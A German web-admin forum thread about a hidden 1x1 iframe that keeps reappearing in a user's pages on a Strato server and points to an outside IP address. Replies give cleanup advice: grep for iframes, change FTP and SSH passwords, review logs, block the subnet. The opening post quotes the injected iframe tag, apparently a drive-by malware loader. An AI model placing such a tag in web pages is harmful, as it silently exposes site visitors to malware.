Seltsamer Iframe

S

shyning

New Member
Hallo zusammen,

seit einiger Zeit erscheint auf einigen unserer Webseiten folgender Iframe:

HTML: 
<iframe width=1 height=1 border=0 frameborder=0 src="http://208.101.35.90/sp/index.php"></iframe>

Selbst nach manueller Änderung der der betroffenen Seiten ist der Code nach einigen Tagen wieder drin.

Die Seiten liegen auf einem Strato-Server mit Linux 10.0.
Die IP im iframe gehört zu einer Firma mit Namen simersine.com.
Der iframe selbst enthält nur ein leeres head-Tag und ein leeres body-Tag.
Die Überprüfung des Servers mit rkhunter und chkrootkit hat nichts ergeben.

Wo kommt das her?
Hat irgendwer sowas schonmal gesehen?

Vielen Dank

Chris
 
hallo tyan_trinity,

zur Zeit läuft auf dem Server meines Wissen keine Typo3 Präsenz. Kann aber sein, dass da zu Testzwecken mal eine eingerichtet war (nicht von mir).
 
Hmm, ok, war nur ne Vermutung, vor kurzem erzählte ein Kollege, der einige Typo3-Präsenzen hostet von seinem Problem, das angeblich durch eine unsichere Extension in Typo3 sämtliche Typo3-Präsenzen auf dem Server mit IFrames versehen wurden, die auf eine malayische Präsenz verwiesen. Weiß aber auch nicht wie viel Seemannsgarn der da gesponnen hat. Er hat dann wohl den Server komplett neu aufgesetzt und Datensicherungen zurückgespielt.

Nicht weiter relevant für dein Problem glaube ich.
 
Wir hatten das gleiche Problem mit einem Iframe der auf einen russischen Server gelinkt hat. Wurde dieser angesprungen, versuchte ein cgi-Script einen Trojaner ( Trojan-Spy.Zbot , Keylogger, Screenshots etc.man lese die Beschreibung und wie man diesen ohne Hilfsmittel findet bzw. entfernt) auf dem zugreifenden Client zu installieren. So ein Rootkit nix gut! Der Iframe wurde über einen geklauten FTP-Account mittels Bot! (kam um 5:44 am) platziert.

Ändere umgehend Deine Passwörter für FTP, SSH etc.!Ich nehme mal an, daß bei Dir überwiegend index.php und index.html betroffen sind?
Mach doch mal folgendes:

find /pfad/www/ -type f -print0 |xargs -0 grep -i iframe > /pfad/datei.log
Click to expand...

Dann das soeben befüllte Log untersuchen, welche Datein innerhalb der www Umgebung betroffen sind.Bei uns hat der Bot lediglich diesen iframe platziert und nur Ordner wie public_html , admin, include etc. angesprungen. Alles andere, was da noch so lagerte, unberührt gelassen. Über HTTP haben derartige Schmutzfinken so ihre Probleme, sofern mod_security mit entsprechenden Rules installiert ist. Sichte Deine FTP-Logfiles! So ein Bot erledigt das in einer Minute. Halte nach mehreren zeitlich aneinandergrenzenden Einträgen ausschau. Dann schmeiss das Netz 208.101.35.0/24 per IPtables raus. Der Bot wird sicher Freunde eingeladen haben ;) Du solltest daher unbedingt Vorkehrungen treffen...Logfiles sichten, Traffic beobachten etc.

Und überprüfe unbedingt Deine(n) Rechner, von dem aus Du den Server administrierst, mit entsprechenden Trojaner- und Spywarescannern! Möglichst vor dem ändern der Passwörter ;) ... und das im abgesicherten Modus.

Gegen ein geklautes Passwort nützt selbst die beste Administration nichts. Man könnte die Dienste abschalten, wenn diese nur sporadisch gebraucht werden und nur zum ändern von Inhalten/Administration aktivieren.

Gruss Rico

Ps. Surft einer Deiner Mitarbeiter auf Pornoseiten? ;) Dann hau dem auf die Finger!
 
Last edited by a moderator:
You must log in or register to reply here.
Back
Top